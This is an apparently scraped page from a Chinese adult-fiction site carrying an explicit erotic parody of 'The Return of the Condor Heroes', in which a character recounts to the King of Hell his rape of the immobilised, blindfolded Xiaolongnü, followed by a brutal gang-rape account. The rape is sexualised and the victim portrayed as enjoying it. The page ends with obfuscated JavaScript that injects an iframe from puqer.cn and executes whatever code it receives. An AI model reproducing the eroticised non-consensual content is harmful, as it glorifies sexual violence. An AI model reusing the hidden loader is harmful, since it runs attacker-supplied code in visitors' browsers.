字幕網- 每日更新 永久免費

尹誌平是全真教丘處機道長的首席大弟子,此人在《神雕俠侶》一書中,尋得千載難縫的良機,將冰清玉潔、白壁無暇的小龍女破了處女之身。

  此人的這次偷奸行為,取得了極大的成功,一是小龍女當時誤以為與她交合的是心上人楊過,因此春心大發,全身心地與之配合,使尹誌平順利地享受到了男女合歡的極高樂趣;二是尹誌平將小龍女奸過之後,小龍女居然還不知道真正破她處女之身的是誰?如果不是全真教另一弟子即尹誌平的師弟趙誌敬坦白,恐怕尹誌平將永遠逍遙法外。那幺,尹誌平是怎樣奸汙小龍女的呢?

  《神雕俠侶》中隻有簡單的描寫,所以世人並不知詳情,整個事件的經過,還是尹誌平被小龍女殺死後,來到陰間受審,秘底才為眾人所知曉。話說尹誌平被小鬼從陰界大門帶到閻王大殿過堂聽審……

  「砰」的一聲,驚堂木重重落下,尹誌平嚇得心頭一跳,他連忙用手扶穩插在胸口上的長劍。這柄劍是小龍女親手送入他胸膛的,他不忍心拔出來。他抬頭看看座上的閻王,他知道自己已經死了。原來地獄是這樣的。閻王大人生得真高大啊,有好幾十丈高;頭上戴著一頂有兩隻像牛角一樣的帽子,身上穿著淺藍色的奇怪服飾,頸上還綁了條黑布帶,好奇怪啊!

  「犯人!報上名來。」閻王的聲音大得幾乎將尹誌平的耳膜震穿。

  「貧道…不…罪民…不…」一時間,尹誌平不知該怎樣稱呼自己才恰當。

  「砰!」驚堂木又再重重拍下,把尹誌平整個震起,他嚇得伏在地上,不敢動彈。

  「少給我羅羅嗦嗦的!快說!」

  「是…是…小民姓尹,原名平,是山西人士,為全真教誌字輩弟子,故名尹誌平。」

  又是「砰」的一聲:「什幺平?怎幺會有這幺混帳的名字,你他媽的!算了,算了,本王問你,你是否偷奸了小龍女?」

  「小民認罪。」尹誌平一麵說,一麵抬頭偷偷地向宏偉的閻王殿四處張望。

  閻王殿好大呀!除了有判官和牛頭馬麵之外,還有兩個人坐在閻王大人的旁邊。那坐在閻王右手邊的是個怪人,頭上長出兩條像蟑螂一樣長長的觸須,鼻上架著兩片黑色的小圓片,身上的黑袍有個大大的「界」字。坐在左麵的是個幹瘦老翁,有著長長的白須,鼻上也架著一樣的黑色小圓片,而且在背上奇奇怪怪的背著個大龜殼。

  閻王說:「不必多說,本王要你複述一遍偷奸小龍女的經過。你必須詳詳細細、真真實實地給我說出來,你他媽的!不可有半點遺漏,否則重重有罰!」

  「是!是!」尹誌平恭敬的應道:「大人,事情是這樣的。話說那一晚…」

  「你他媽的!且慢!」閻王喝止了他。

  「先戴上這個頭罩。」閻王傍邊的判官先生給尹誌平遞上一個奇怪的頭罩。

  「這是…?」尹誌平有些遲疑。

  「叫你戴,你就戴吧!你他媽的!」閻王發火了。

  「這是本王專門托人從廿三世紀用高價買回來的虛擬錄像機。」

  他望了望坐在左邊的幹瘦老翁:「很珍貴的,唉!總共花了我五百年的糧餉!」

  尹誌平根本不明白他在說什幺,但也不敢追問,隻好馬上戴上頭罩。咦!蠻舒服呢!他看見閻王和左右兩邊的怪人,都匆匆的戴上一樣的頭罩。真是令人摸不著頭腦。

  「快開始吧!」話音未落,一盆熱水淋落到尹誌平身上,把他淋得一身都濕了。

  他抬頭一看,原來是閻王大人口角流下的口涎,難怪黏黏的呢。

  「你他媽的!快說,快說。」閻王已不耐煩地在催促了。

  「是!」尹誌平應道,腦海中浮現出那畢生難忘的一晚。

  「那一晚,天氣特別炎熱,我吃過晚飯便回房間做晚課,也就是念《道德經》。雖然我表麵上是在念經,但腦海中卻隻有前幾天晚上和趙誌敬撞破龍姑娘和楊過練功的情形。就是那一天,我們在後山花叢中見到他倆人赤身露體的,說是在練功。龍姑娘好像還受了傷哩。」

  閻王大聲的說:「前因後果不用說了!你他媽的!我們都知道得一清二楚。《神雕俠侶》我總共看了七次。你他媽的!虛擬錄像光碟是很昂貴的!」

  又是莫明其妙的話,什幺《神雕俠侶》?

  尹誌平隻得搔著頭應道:「是!」

 「我腦中滿是龍姑娘那白晰的雪膚,根本不能集中精神念經。於是我又溜到後山去。說是想去乘涼,其實是想再碰到龍姑娘。我剛走到後山,便見到楊過那小子被一個怪人拉著走到樹林的另一邊。我悄悄的跟蹤他們,原來那人竟是西毒歐陽鋒!我嚇了一跳,正想跑回道觀裏稟告師傅和各位師叔伯,卻聽到楊過說龍姑娘在樹林中被歐陽鋒封住了穴道,動彈不得,我頓時心中一陣狂跳,感到機會來了。」

  「我實在太想和龍姑娘交合了,便偷偷避開歐陽鋒和楊過的注意,潛回樹林。我找了好一會,才在樹林角落的小空地上,見到龍姑娘睡在地上。她真的好美呀,我又不敢走近,害怕被她發現。你知道,她的武功遠在我之上。我躲在遠處觀察了很久,都不見她稍有移動。我想歐陽鋒的點穴功夫一定十分獨特,否則以龍姑娘的武功,又怎幺會衝不開被封的穴道呢?師傅曾經說過,西毒歐陽鋒的絕招叫做「蛤蟆功」,是很厲害的邪門武功……」

  「廢話少講!你他媽的!快一點到正題吧!」閻王氣得滿麵通紅。

  「是…是…於是我拾起龍姑娘掉在花叢邊的手絹,上麵沾有龍姑娘的香味,我在上一次見她用過的,據說是用金蠶絲織成的,刀槍不入…」

  他的眼角瞟到閻王大人的腳又氣得發震了,連忙說:「我怕她看到是我,便先伏在地上爬過去,以迅雷不及掩耳的手法,用手絹蒙住她的雙眼。她果然一動也不動,胸口在微微的起伏,我看得癡了!」

  「我從來沒有在這幺近的距離看過龍姑娘,於是我大膽地湊近她美麗的麵龐,細細的欣賞。她真可算是天下第一美女啊,比有天下第一美女之稱的黃蓉黃施主更加美上千倍。龍姑娘的身上還散發出一種彙集了百花清香的無比幽香。我一時意亂情迷,便鬥膽吻在她的臉上。她全身一震,嚇得我連心都差點跳了出來,全身都僵硬了。但後來見她仍是一動也不動,便放膽的在她臉上和嘴上亂吻。」

  「我吻著吻著,龍姑娘的鼻息漸漸加重,嗬氣如蘭,我鼻中盡是龍姑娘撲鼻的體香,心中燃起一陣從未有過的欲火。我的手不受控製地在龍姑娘的身上亂摸。一接觸到她高聳的胸脯,我已感到全身血氣直往腦上衝,心中亂作一團。最後,我一咬牙,伸手扯開龍姑娘的腰帶。」

  尹誌平沉迷在回憶之中,他沒有見到閻王殿上人人的褲襠都已高高的撐起了。

  「我當時一時衝動,解開龍姑娘的腰帶,翻開她的衣衫。頓時像冰雪一樣炫目的雪白肌膚馬上暴露在我的眼前。龍姑娘的胸部高高地聳起,錦紗包著的那兩團東西好象在招引著我去撫摸它們。我顫抖著、全身哆嗦著,輕輕地解開了那錦紗,啊!兩隻玉免般的胸乳蹦彈出來,在我的手中抖動。我雖然從未見過女人的乳房,但我肯定龍姑娘的乳房是世間上最美麗的!我根本製止不了自己,便吻了上去。呀!又香又甜!比燒饅頭更加美味。」

  「燒饅頭?你他媽的!這臭小子的形容詞真是大殺風景。」閻王心中在咒罵著。

  「我一口含著龍姑娘的鮮嫩乳房,手在她像綢緞般幼滑的雪膚上撫摸。我的陽物已脹得很大,在褲子中頂得很辛苦。」

  「我慢慢褪去龍姑娘的下裳,一股奇香馬上充滿了整個樹林。我一看龍姑娘的下身,那真是世間獨一無二的美景呀!像花瓣一樣嬌嫩的陰戶上有著疏落的柔毛,中間的淺溝中正流出香濃的花蜜。我用舌頭舔了一下,那蜜液比玉蜂漿還要香甜。我已經色膽包天,這時就算用劍架在我的脖子上,我也不能停下來了。我試著用手指挑開龍姑娘的美麗花瓣,但一鬆手,花瓣又再緊迫的合上。」

  「我隻有一手用手指分開花瓣,然後用手指試探性的插入龍姑娘的秘洞中。呀!那種緊湊的感覺,我到現在還是記憶猶新。龍姑娘雖然不能動,但我知道她也是很舒服的,因為我見到她的蜜洞不斷滲出瓊漿玉液,而且混身上下也浮現出像荷花樣的淺紅色。」

  「我已被熊熊欲火燒得失去了理智,便解開自己的褲帶,讓陽具透一透氣。我心中十分矛盾,一方麵是和夢寐以求的女神交合的難得機會;一方麵理智又告訴我這是喪盡天良的獸行,真是兩難呀!我想,自己是全真教的大弟子,將來極有可能榮登掌門大位。但龍姑娘又實在令人心裏癢癢的,唉!」

  「你他媽的!到緊要關頭你還講什幺廢話呀!你他媽的!」閻王急喘著氣,他的褲襠已高高撐起象一個大帳幕。

  他氣急敗壞的大聲吼叫:「求求你,快一點好不好?」

  「是…是…」尹誌平嚇了一跳,連忙接著說下去:「我先將龍姑娘的上衣攤開,使她雪白的身體完全暴露出來,然後再把她的下衣完全除下,她的身體整個展現在我的麵前。我脫去自己的衣褲,跪在龍姑娘的兩腿之間,分開龍姑娘的雙腳,然後將陽具頂在龍姑娘的陰戶上。我知道龍姑娘很緊張,她全身都在顫抖,蜜穴中不斷地流出清香的花蜜。然後…」

  「然後怎樣?」閻王真的很心急了。

  「然後我用力一頂,但由於我太心虛,陽具竟然滑開,撞在地上,痛得我幾乎喊了出來,幸好我手快,趕緊把嘴掩住了。」

  「哎呀!」閻王失聲驚叫。他沒想到世間還有這樣的笨人。

  「咦!怎幺閻王大人在喊痛?」尹誌平當然不明白閻王在想什幺。

  「我歇了一會,又用手幫助了好久,陽具才又重新脹起。於是我便再擺正位置,將陽具貼在龍姑娘的陰戶上,先慢慢地將陽具前端送入龍姑娘的陰道,這時,我看見龍姑娘全身都在顫抖,陰道中流出大量的蜜汁,這使我感到這次插入必定不會再失敗了,於是我抓緊時間用力將陽具整根往龍姑娘的秘穴中送,她全身一震,她的玉洞真的是又緊又窄呀!我忍不住用盡全力地直往前衝,一下子將整條陽具都插進了她那小小的洞裏去了…」

  尹誌平頓住了,沒有接著說下去。

  「然後呢?」這次座上三人一齊衝口而出,這臭小子太可惡了,在這重要關頭還在賣關子。

  「然後…」尹誌平怯懦的說道:「我就爬俯在龍姑娘的身上,輕抬下體,讓陽具在龍姑娘的陰道內慢慢進出……」

  閻王問道:「那你的感覺如何?」

  「……」尹誌平心中一悶,心想:「審問還要問這些?」

  閻王見尹誌平的表情,就心知他正在想什幺,於是又將驚堂木猛地一拍,罵道:「你連感覺都說不來?可見所言有假……」

  尹誌平隻好繼續往下說:「小民的陽具在龍姑娘的陰道內進出,每一次插進去,都覺得龍姑娘的陰道十分的嫩滑,那裏麵仿佛有一種吸引力在拉著我的陰具往裏插,迫使我將陽具插得盡可能地深入,我感到陽具頭已抵到龍姑娘的花蕊上;每一次退出來,陽具都要帶出大量的蜜汁,花香味沁人心脾,讓人聞之陽具暴漲。那時,我真以為龍姑娘是上天專門派來誘惑男人的女神,否則無法解釋這種奇怪的現象……」

  「我受到這種刺激後,加快了進出的力度,陽具全根而入,全根而出,棒棒直抵小龍女花蕊,體會著天人合一的極大快感……」

  閻王又問道:「此時小龍女情形怎樣?」

  尹誌平說道:「龍姑娘臉上蓋著手絹,所以小民無法見其表情,但我見她隨著我的陽具的每一次進出,身體都顫動不止,想必是十分的舒服,特別是在我加快進出的力度後,她嬌喘籲籲、香汗遍體,下身沾滿了流出來的蜜汁。她被歐陽峰點了穴道,動彈不得,此時又遇男女交合,本來應與心上人擁抱在一起,共享人間致樂,無賴手腳被製,隻得吐氣若蘭,閉目享受了……」

  「你怎幺知道她十分的舒服?」閻王不滿尹誌平的自作多情,嘲笑著問。

  「小民雖說從未與女人交合,但也初通醫理,稍知采陰補陽之說。小民在龍姑娘的陰道內加快進出的次數後,龍姑娘突然全身顫抖,陰道內急劇痙攣,大量乳白色的液汁湧出,這依小民看來,顯然是極樂之期到來了,所以小民認為她是十分的舒服。」

  閻王不屑地說:「你以為這是你的功勞嗎?人家小龍女認為此時與她交合的是心上人楊過,所以才情欲大發。如果知道是你,就算你是天下第一美男,人家斷然不會與你成就好事!」

  閻王這一番話,正刺中了尹誌平的痛處,因為他雖然破了小龍女的處女之身,但不過是偷奸而已,怎能比得上楊過與小龍女的天作之合。

  但這番話也激起了尹誌平對楊過的恨憤之情,他瞪著血紅的雙眼,恨恨地說道:「楊過算什幺東西,他再行也隻能用老子玩剩的東西。想起他老子就一肚子的氣,也罷,老子拿他沒辦法,但現在他老婆落在我手裏,正好讓老子出口惡氣。於是老子在小龍女體內狂抽猛插,全根進退,我幹她,我用力幹她……」

  尹誌平有點瘋狂了,顯得有些語無倫次。

  「……進出了約五百多下後,感到情欲越來越強,於是我就全身壓在小龍女的身上,雙膝觸地,雙手抱著小龍女的肩部,臀部加快聳動,我死命地聳動、聳動……最後,我將自己保存了二十幾年的童子之精全部噴進小龍女的處女之穴,讓她的體內第一次流進了男人的玉精,我好快活呀……」

  就在尹誌平發瘋似地狂叫時,閻王殿上每一個人的胯下都猛地噴出一道白亮亮的液柱,尤其是閻王胯下噴出的那一柱更猛、更白、更多、更遠……

  「你終於射了!」閻王惱得頭筋都現了:「你搞了小龍女幾次?」

  「我…大人…隻有一次……」

  「什幺?一次?你他媽的為什幺不多來幾次?」閻王追問道。

  「機會難逢,我本來也想多來幾次的,但由於小民第一次出精太多,陽具軟軟的一時之間硬不起來。我怕楊過會回來,於是便匆忙地用衣服蓋住龍姑娘的身體,然後慌忙逃走了。」

  「砰」地一聲,「你他媽的!你他媽的!你他媽的!你他媽的!」閻王氣得一手掃落桌上的所有物件,一時間竟說不出話來。

  「你這個混蛋,麵對著千年難遇的美女,你竟然隻搞了一下?」他氣得猛跺腳,把整個閻王殿震得東歪西倒、七零八落、塵土飛揚。

  他亂叫亂跳,好一會才頹然地坐回椅子上。

  「判官,現在宣判這個什幺尹什幺平的混蛋的判刑,你他媽的!」閻王的臉仍是氣得紅紅的,快爆血管了。

  「罪民尹誌平,虛偽奸詐、荒淫無度、禽獸不如、欺師滅祖、殺人放火、包娼庇賭、偷蒙拐騙、迫良為娼、為虎作倀、賣友求榮、陽痿、女人形、性無能、性變態、漢奸、出賣全人類…總之是壞事做盡,本王現在判他跌落十八層地獄,受盡所有刑罰,永不超生!」閻王一輪嘴的數個不停。

  尹誌平聽得呆了,等到閻王一口氣說完,他才如夢初醒。「冤枉呀!大人冤枉呀!」

  「來人!把他押下去!」

  「冤枉呀!冤枉呀!」尹誌平的慘叫聲在空洞的大殿上長長地飄蕩著。

  看著尹誌平被小鬼拖了下去,閻王感到很是開心,正準備叫退堂,這時,信差給閻王送來一封公文,原來是負責審理尹誌平師弟趙誌敬的監察史送來了趙誌敬的供詞,其中也有談到趙誌敬看見尹誌平偷奸小龍女的一段證詞。原來趙誌敬原本是可以阻止尹誌平的獸行的,但他想抓住這位師兄的把柄,所以也就讓尹誌平得償所願。

  閻王注意到趙誌敬的證詞與尹誌平的口供有兩點不符,一是趙誌敬說看見尹誌平奸了小龍女好幾次,由於陽具進出小龍女陰道的力度過大、次數過多,致使小龍女昏厥過去,小龍女醒來之後,見到楊過,所以小龍女始終誤以為是楊過破了她的處女之身;二是趙誌敬本人在尹誌平溜走後,乘小龍女昏迷不醒之機,也在小龍女的身上發泄了幾次獸欲。

  由於趙誌敬比尹誌平更痛恨楊過,但武功又打不過楊過,因此將全部怨氣發泄到小龍女身上,他不但將小龍女的下體幹得紅腫潰爛、鮮血直流,而且還懷著不留小龍女一點幹淨之身給楊過的變態心理,最後兩次交合時,他先是將濃精噴入小龍女的嘴裏,最後一次竟然殘忍地將陽具狠狠地頂入小龍女的後庭之門,將男精灌滿了小龍女的後穴。

  爾後,他還將小龍女那沾有處女之血及陰道蜜汁的下衣順手帶走了。蒼天有眼,由於尹誌平、趙誌敬在輪奸小龍女的過程中,出精太多,又由於他們在武功未成之前就自毀童男之身,加之害怕醜行暴露,終日惶惶不安,因此,他們兩人的武功在以後始終未能取得大的突破,尤其是趙誌敬,由於心理卑劣,自采得小龍女的後庭之樂後,日思夜想的是小龍女的玉體,整日用偷來的小龍女的衣物裹著陽具手淫出精,哪有心思苦練武功,因此才會在後來被小龍女斬殺。

  閻王讀罷公文,興趣又來了,他吩咐左右道:「來人啊!立刻去監察史那裏,將趙誌敬鎖來庭審!」一場新的鬧劇又將展開。

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:新婚夜新娘懷別人的種作者不詳
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};